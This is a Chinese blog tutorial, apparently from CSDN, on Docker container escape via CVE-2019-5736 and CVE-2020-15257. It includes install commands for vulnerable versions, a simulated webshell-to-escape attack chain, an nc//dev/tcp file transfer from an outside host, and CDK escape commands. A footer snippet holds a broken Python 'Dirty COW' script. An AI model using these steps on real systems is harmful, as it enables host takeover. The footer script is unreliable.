【云安全】云原生-Docker(五)容器逃逸之漏洞利用

已于 2025-01-25 19:07:59 修改
阅读量2.1k 收藏 32
点赞数 34
文章标签: 云原生 docker 容器 网络安全 web安全 安全性测试 安全
于 2025-01-25 14:29:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ggqiuhui/article/details/145299637
版权

漏洞利用逃逸

通过漏洞利用实现逃逸,主要分为以下两种方式:

1、操作系统层面的内核漏洞

这是利用宿主机操作系统内核中的安全漏洞,直接突破容器的隔离机制,获得宿主机的权限。

攻击原理:容器本质上是通过 Linux 的 cgroups 和 namespace 提供隔离,而这些功能依赖于内核。因此,内核漏洞可能被用来突破隔离,攻击者可以直接访问宿主机。

常用漏洞:

  • Dirty COW (CVE-2016-5195):Linux 内核的写时复制 (Copy-On-Write) 漏洞,攻击者可以通过漏洞实现提权,影响宿主机。
  • OverlayFS 漏洞 (如 CVE-2021-3493):OverlayFS 文件系统中的权限校验漏洞,允许容器突破文件系统限制访问宿主机。
  • 权限提升漏洞 (如 CVE-2022-0847):又名“Dirty Pipe”,允许攻击者通过文件写入操作实现提权。
  • 其它:CVE-2019-16884、CVE-2021-22555、CVE-2022-0492、CVE-2022-23222等

系统内核漏洞并非 Docker 容器逃逸的“专属”利用方式,而是通用的一种权限提升技术。在 Web 安全或本地提权攻击场景中,内核漏洞同样可以被用来获取更高的系统权限。本章节属于云安全Docker内容,因此,内核漏洞的利用本文不做具体讨论。

2、Docker自身版本漏洞

Docker 本身作为容器管理工具,可能存在漏洞或实现上的不足,攻击者可以通过漏洞逃逸出容器环境,直接控制宿主机。

常用漏洞:

CVE-2019-5736

攻击者通过覆盖容器内的 runc 二进制文件,可以执行任意代码并控制宿主机。

利用条件

(1)版本:Docker version <= 18.09.2,RunC version <= 1.0-rc6 

(2)需要管理员再次进入容器触发

漏洞复现

a.首先卸载原有docker

sudo apt-get purge -y docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin docker-ce-rootless-extras
sudo rm -rf /var/lib/docker
sudo rm -rf /var/lib/containerd
sudo rm /etc/apt/sources.list.d/docker.list
sudo rm /etc/apt/keyrings/docker.asc

b.安装漏洞对应版本

apt-get update
apt-get install -y apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
apt-get update
apt-cache madison docker-ce
apt-get install docker-ce=18.06.1~ce~3-0~ubuntu

c.编译exp ,项目地址

https://github.com/Frichetten/CVE-2019-5736-PoC/blob/master/main.go

下载EXP后修改

使用如下命令进行编译EXP

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

d.准备另一台主机进行监听,上传EXP到容器,执行

e. 模拟管理员进入容器,触发EXP执行,成功反弹shell,复现完毕

模拟实战

受害者搭建网站

攻击者发现存在 Spring Cloud Gateway 命令执行漏洞

发现是容器root权限

植入内存马,使用哥斯拉连接

使用哥斯拉的远程下载功能,下载EXP,并赋予执行权限

监听、执行→管理员进入容器→成功逃逸

CVE-2020-15257

该漏洞出现在 containerd 的 CRI plugin(容器运行时接口插件)中。攻击者可以通过创建特定配置的容器,将 cgroups(控制组)的 pids.max 参数设置为无效值。当 containerd 尝试写入这个值时,会导致内核返回错误。这可能使 containerd 的内部机制中断,从而允许攻击者进一步利用该错误实现权限提升。

利用条件

(1)版本:containerd < 1.4.3,containerd < 1.3.9(不含1.3.9 和 1.4.3

(2)容器权限为root,且以 --net=host 模式启动

模拟复现

a. 受害者安装的containerd版本为漏洞版本

apt-get update
apt-get install ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add -
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu xenial stable"
apt-get update
apt-cache madison docker-ce
apt-get install docker-ce=5:19.03.6~3-0~ubuntu-xenial docker-ce-cli=5:19.03.6~3-0~ubuntu-xenial containerd.io=1.2.4-1

b.受害者基于以上环境搭建的网站,存在struts2漏洞

c. 攻击者发现漏洞。执行命令,发现是容器环境,权限为容器root

d.攻击者反弹shell后,在受害者容器内下载CDK项目

e.后续利用,搜寻教程和资料说是可以借助自动化项目CDK进行容器逃逸。但是,不知道哪里出了问题,该漏洞我未能复现成功,猜测是各大云厂商做了安全优化,一路上各种报错,如果哪位大佬知道其中的缘由,还望告知!

自动化项目:CDK

项目链接:
GitHub - cdk-team/CDK: 📦 Make security testing of K8s, Docker, and Containerd easier.

CDK是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。集成Docker/K8s场景特有的 逃逸、横向移动、持久化利用方式,插件化管理。 

下载/植入
  • 在目标容器内直接wget或者curl
  • 通过公网主机nc重定向
A主机:nc -lvp 999 < cdk
B主机:cat < /dev/tcp/A主机IP/999 > cdk

 

功能模块
  • Evaluate: 容器内部信息收集,以发现潜在的弱点便于后续利用。
  • Exploit: 提供容器逃逸、持久化、横向移动等利用方式。
  • Tool: 修复渗透过程中常用的linux命令以及与Docker/K8s API交互的命令。
使用测试

以特权模式启动一个容器

在容器中下载CDK

信息收集

./cdk eva

发现特权模式

特权模式利用

 ./cdk run mount-disk

使用自动逃逸也是没问题的

 ./cdk  auto-escape id

Ps:该项目还是很强大的,经测试,特权模式、危险挂载均可以检查并利用,师傅们可自行测试

结尾

至此,Docker安全问题分析结束,下一篇开始,讨论容器编排工具k8s的安全问题

仇辉攻防
关注
云原生安全攻防》-- 容器攻击案例:Docker容器逃逸
07-14 1025
当攻击者获得一个容器环境的shell权限时,攻击者往往会尝试进行容器逃逸利用容器环境中的错误配置或是漏洞问题,从容器成功逃逸到宿主机,从而获取到更高的访问权限。在本节课程中,我们将详细介绍一些常见的容器逃逸方式,包括相应的检测方法和利用方式,帮助大家了解容器逃逸这种攻击手法的更多攻击细节。在这个课程中,我们将学习以下内容:常见容器逃逸方式:容器逃逸方式分类和简介。容器逃逸案例:详细介绍多个场景下...
云原生安全攻防》-- K8s攻击案例:从Pod容器逃逸到K8s权限提升
10-09 963
在一个完整的K8s攻击链路里,攻击者往往会通过入侵容器应用拿到shell权限,作为起始攻击点,随后从容器逃逸到宿主机,获取宿主机权限。接下来,攻击者会进一步攻击k8s集群的组件或窃取高权限凭证完成K8s权限提升。在本节课程中,我们将介绍一个完整K8s攻击链路的案例,其中包括了从web入侵到容器逃逸,再到K8s权限提升的过程。第一个思路:攻击K8s集群的组件,通过利用这些组件的漏洞或不安全配置来获取对集群的控制权。2、案例解析:构建演示完整K8s攻击链路的攻击环境,深入分析具体的攻击细节。
后渗透——Docker容器逃逸
未完成的歌~的博客
02-22 1606
在渗透测试中,如果获取了目标主机的 shell,但发现其运行在 docker 环境中,要进一步渗透,就需要逃逸到宿主机。另外,还可能存在更复杂的场景,例如物理机运行虚拟机,虚拟机再运行 docker 容器,这种情况下还需要实现虚拟机逃逸。本文主要总结关于 docker 容器逃逸的相关技术与方法。涉及内核漏洞的提权原理都比较复杂,很难理解,会用 poc 就行了。其余逃逸很大程度都是通过挂载进行逃逸。要么本容器挂载,要么本容器里再创建一个容器挂载。
Docker 容器逃逸漏洞 (CVE-2020-15257)复现
玄道的网安博客
12-27 1422
漏洞概述 containerd是行业标准的容器运行时,可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中,容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0,但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器(有效UID为0,但特权降低)导致新进程以提升的特权运行。 影响版本 containerd < 1.4.3 containe...
Docker逃逸总结,从零基础到精通,收藏这篇就够了!_打开容器终端并关闭 如何处理容器中sh进程泄露
最新发布
喜欢Python编程的程序员柚柚呀
04-10 824
在版本1.3.9之前和1.4.0~1.4.2的Containerd中,由于在网络模式为host的情况下,容器与宿主机共享一套Network namespace ,此时containerd-shim API暴露给了用户,而且访问控制仅仅验证了连接进程的有效UID为0,但没有限制对抽象Unix域套接字的访问,刚好在默认情况下,容器内部的进程是以root用户启动的。Docker 监护进程有一个特性,它能被允许访问 root 用户或者是在 docker 组里面的所有用户,这就如同拥有 root 的访问权限。
新近爆出的runC容器逃逸漏洞,用户如何面对?
weixin_33912445的博客
02-13 283
runC是一个根据OCI(Open Container Initiative)标准创建并运行容器的CLI工具,目前Docker引擎内部也是基于runc构建的。 2019年2月11日,研究人员通过oss-security邮件列表(https://www.openwall.com/list... )披露了runc容器逃逸漏洞的详情,根据Ope...
docker逃逸漏洞复现(CVE-2019-5736)
网络安全。
01-29 1万+
0x01 概述 2019年2月11日,runC的维护团队报告了一个新发现的漏洞,该漏洞最初由Adam Iwaniuk和Borys Poplawski发现。该漏洞编号为CVE-2019-5736,漏洞影响在默认设置下运行的Docker容器,并且攻击者可以使用它来获得主机上的root级访问权限。 0x02 漏洞原理 漏洞点在于runC,RunC是一个容器运行时,最初是作为Docker的一部分开发的,后...
docker逃逸复现(CVE-2020-15257-host模式容器逃逸漏洞
m0_63306943的博客
02-28 1533
因为docker所使用的是隔离技术,就导致了容器内的进程无法看到外面的进程,但外面的进程可以看到里面,所以如果一个 Docker 容器内部可以操作该容器的外部资源,一般理解为操作宿主机的行为。叫做docker逃逸。host模式这种模式下,容器和主机已经没有网络隔离了,它们共享同一个网络命名空间,容器的网络配置和主机完全一样,使用主机的IP地址和端口,可以查看到主机所有网卡信息、网络资源,在网络性能上没有损耗。但也正是因为没有网络隔离,容器和主机容易产生网络资源冲突、争抢,以及其他的一些问题。
docker容器逃逸漏洞复现
温和的跳跃
01-23 378
今天研究这个,漏洞复现
红队攻防渗透技术实战流程:云安全云原生安全:内核漏洞和版本漏洞
HACKONE的博客
05-21 746
常规检测:https://github.com/teamssix/container-escape-check。检测利用:https://github.com/cdk-team/CDK。-CVE-2020-15257 containerd逃逸。4、实验获取到docker搭建的Web权限后进行逃逸。#云原生-Docker安全-容器逃逸&CDK自动化。#云原生-Docker安全-容器逃逸&内核漏洞。#云原生-Docker安全-容器逃逸&版本漏洞-CVE-2019-5736 runC容器逃逸
Docker Dirtypipe(CVE-2022-0847)漏洞复现与分析容器逃逸
SHELLCODE_8BIT的博客
08-07 1078
GitHub - greenhandatsjtu/CVE-2022-0847-Container-Escape: CVE-2022-0847 used to achieve container escape 利用CVE-2022-0847 (Dirty Pipe) 实现容器逃逸
云原生进阶之容器】第容器运行时5.7--容器逃逸原理
junbaozi的专栏
04-11 929
容器逃逸,是指“流氓”容器尝试突破正常隔离环境限制,借助一些手段获得容器所在的直接宿主机、宿主机上的其他容器或集群内其他主机、其他容器的某种权限下的命令执行能力,进行恶意攻击或执行越权访问的行为。容器逃逸漏洞可能打穿容器节点,甚至整个集群。
Docker 逃逸 漏洞复现
Jack_chao_的博客
03-27 1530
CVE-2020-15257-host模式容器逃逸漏洞分析
Docker 容器逃逸漏洞 (CVE-2020-15257)
热门推荐
12-26 2万+
漏洞简述: 当在docker使用–net=host参数启动,与宿主机共享net namespace时,容器中的攻击者可以绕过访问权限访问 containerd 的控制API 进而导致权限提升。 漏洞利用(1)安装有漏洞的containerd版本,影响版本containerd< 1.3.9&&containerd < 1.4.3 #列出仓库中可用的版本,安...
Docker容器逃逸漏洞-CVE-2024-21626
墨痕诉清风的博客
07-23 711
Snyk 在 Docker 引擎以及其他容器化技术(例如 Kubernetes)使用的 runc <=1.1.11 的所有版本中发现了一个漏洞利用此问题可能会导致容器逃逸到底层主机操作系统,无论是通过执行恶意映像还是使用恶意 Dockerfile 或上游映像构建映像(即使用时FROM)
CVE Docker逃逸漏洞的复现
8888的博客
06-15 1058
它允许开发者将他们的应用及其依赖包打包到一个可移植的镜像中,然后发布到任何流行的Linux或Windows操作系统的机器上,并且实现虚拟化。docker可以安装软件,也可以安装一个操作系统。需要在不同操作系统中引入一个中间层,中间层很多版本,可以在Windows、Linux、centos等等的不同操作系统之间引入一个中间层,可以用来屏蔽底层环境的差异。靶机:需要先运行一个拥有命令行的镜像比如 ubuntu:18.04 ,我们需要在进入镜像,在容器的命令行执行下载远程恶意文件,我们给他增加权限,然后执行。
Docker未授权访问漏洞利用
tangshuangsss的专栏
01-08 2166
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到...
Docker容器逃逸
weixin_44720441的博客
08-23 1521
Docker容器逃逸指的是攻击者通过劫持容器化业务逻辑或直接控制(CaaS等合法获得容器控制权的场景)等方式,已经获得了容器内某种权限下的命令执行能力;攻击者利用这种命令执行能力,借助一些手段进而获得该容器所在的直接宿主机(当遇到“物理机运行虚拟机,虚拟机再运行容器”的场景时,该场景下的直接宿主机指容器外层的虚拟机)上某种权限下的命令执行能力。
docker逃逸漏洞(CVE-2019-5736)
chaojixiaojingang
12-23 1万+
1.漏洞描述 2019年2月11日,runC的维护团队报告了一个新发现的漏洞,SUSE Linux GmbH高级软件工程师Aleksa Sarai公布了影响Docker, containerd, Podman, CRI-O等默认运行时容器runc的严重漏洞CVE-2019-5736。漏洞会对IT运行环境带来威胁,漏洞利用会触发容器逃逸、影响整个容器主机的安全,最终导致运行在该主机上的其他容器被入侵。漏洞影响AWS, Google Cloud等主流云平台。日前,该容器逃逸漏洞的PoC利用代码已在...
容器逃逸漏洞复现
04-04
### 容器逃逸漏洞复现方法 容器逃逸漏洞是指攻击者能够利用某些漏洞容器内部突破到宿主机,从而获得对宿主机的操作权限。以下是关于如何复现此类漏洞的一些关键点: #### 一、漏洞概述 Dirty COW(CVE-2016-5195)是一个典型的写时复制(Copy-On-Write, COW)机制漏洞,它允许低权限用户通过竞争条件修改只读内存映射页面的内容[^1]。此漏洞不仅适用于传统操作系统上的提权场景,在容器环境中也可能被用来实现容器逃逸。 #### 二、环境准备 为了成功复现该类漏洞,通常需要搭建特定的实验环境: - **目标系统**:选择受支持的 Linux 发行版及其对应的内核版本。例如,对于 Dirty COW 漏洞,受影响的是 Linux Kernel 版本范围内的系统[^4]。 - **Docker 或其他容器运行时工具**:安装并配置好 Docker 或 containerd 等容器管理软件,并确保其版本处于已知易受攻击的状态下[^5]。 #### 三、PoC 分析 针对 Dirty COW 的 POC 主要涉及以下几个方面: - 创建一个多线程程序来触发 race condition; - 使用 `mmap()` 函数将目标文件映射至内存空间; - 不断尝试对该区域进行非法写入直到成功为止[^2]。 下面给出一段简单的 Python 实现作为演示用途,请注意这仅用于学习研究目的不得滥用! ```python import os import threading from ctypes import * PAGE_SIZE = 4096 def dirty_cow(target_file_path): fd = os.open(target_file_path, os.O_RDONLY) addr = mmap.mmap(-1, PAGE_SIZE) def writer(): while True: try: libc.memcpy(addr, b"A", 1) except Exception as e: pass t = threading.Thread(target=writer) t.start() time.sleep(1) # Wait for the thread to start writing. with open("/proc/self/mem", "r+b") as f: offset = addr - libc.valloc(addr) f.seek(offset) data = f.read(PAGE_SIZE) if b"\x41" in data[:len(data)]: print("[+] Exploit successful!") t.join() if __name__ == "__main__": target_file = "/etc/passwd" dirty_cow(target_file) ``` 上述脚本模拟了一个基本的 Dirty COW 攻击过程,其中包含了必要的错误处理逻辑以及多线程并发操作部分。 #### 四、修复措施 为了避免遭受类似的容器逃逸威胁,可以采取如下策略之一或组合使用多种防御手段: - 更新至最新稳定版本的内核及容器引擎组件以修补已公开的安全缺陷[^3]; - 配置最小化权限原则下的容器启动参数,比如移除不必要的 capability 如 --cap-drop=all 和禁用 privileged mode 运行模式等; - 应用 SELinux/AppArmor 强制访问控制框架进一步增强隔离效果; --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值